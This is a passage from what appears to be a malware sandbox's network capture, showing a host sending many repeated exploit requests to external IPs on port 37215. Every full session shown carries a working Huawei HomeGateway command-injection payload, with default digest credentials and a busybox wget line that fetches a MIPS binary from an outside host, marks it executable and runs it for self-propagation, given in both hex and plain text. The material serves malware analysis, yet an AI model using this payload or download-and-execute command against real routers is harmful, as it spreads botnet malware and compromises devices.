6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  124192.168.2.135373241.141.31.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062767029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  125192.168.2.1351838197.95.209.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062767982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  126192.168.2.1333154157.86.121.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062843084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  127192.168.2.13422962.103.62.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062865973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  128192.168.2.1359868157.20.186.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063251972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  129192.168.2.1353516102.234.222.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063750029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  130192.168.2.1355966157.235.127.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063752890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  131192.168.2.135088041.154.158.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063754082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  132192.168.2.1349230175.185.66.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063827991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  133192.168.2.134155841.103.6.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063837051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  134192.168.2.1344802197.176.72.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063869953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
